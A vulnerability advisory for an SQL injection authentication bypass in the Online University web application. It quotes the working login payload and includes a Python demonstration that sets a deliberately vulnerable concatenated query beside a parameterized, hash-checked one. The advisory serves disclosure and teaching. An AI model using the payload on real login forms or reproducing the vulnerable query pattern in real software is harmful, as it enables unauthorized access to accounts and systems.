Vendor: Online University
By: cr4wl3r
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Online University
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Online University (Auth Bypass) SQL Injection Vulnerability
A vulnerability exists in the Online University web application that allows an attacker to bypass authentication by supplying a crafted Login ID and Password. The vulnerability is exploitable only when magic_quotes_gpc is set to off. The PoC is to supply ' or '1=1 as the Login ID and ' or '1=1 as the Password.
Mitigation:
Ensure that magic_quotes_gpc is set to on. Additionally, perform input validation on all user-supplied data.
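The following added example (not code from the Online University application, whose source this page does not show) reproduces the flaw class on a constructed table and sets a string-concatenated login query beside a parameterized one. Python with sqlite3 stands in for the application's own stack; the table, column and function names and the sample account are assumptions.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-salt"    # constructed; use a random per-user salt in real code
PAYLOAD = "' or '1=1"         # the Login ID / Password value quoted in the advisory

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

def make_db():
    # Constructed sample data: one account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login_id TEXT, password TEXT, pw_hash BLOB)")
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", "S3cret!", pw_hash("S3cret!")))
    return db

def login_vulnerable(db, login_id, password):
    # Assumed pattern behind the flaw: user input is concatenated into the
    # SQL text, so a quote in the input ends the string literal and the rest
    # is parsed as SQL. The WHERE clause becomes
    #   login_id = '' or '1=1' AND password = '' or '1=1'
    # which is true for every row.
    sql = ("SELECT login_id FROM users WHERE login_id = '" + login_id +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, login_id, password):
    # Parameterized query: the driver passes login_id as data, never as SQL.
    row = db.execute("SELECT login_id, pw_hash FROM users WHERE login_id = ?",
                     (login_id,)).fetchone()
    if row is None:
        return None
    # The password is checked outside SQL against a stored hash, in constant time.
    return row[0] if hmac.compare_digest(row[1], pw_hash(password)) else None

if __name__ == "__main__":
    db = make_db()
    print("concatenated query:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized query:", login_hardened(db, PAYLOAD, PAYLOAD))
    print("valid credentials:", login_hardened(db, "admin", "S3cret!"))
```

magic_quotes_gpc was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so on current PHP versions the setting is not available. Parameterized queries, as in login_hardened above, address the root cause independently of that setting.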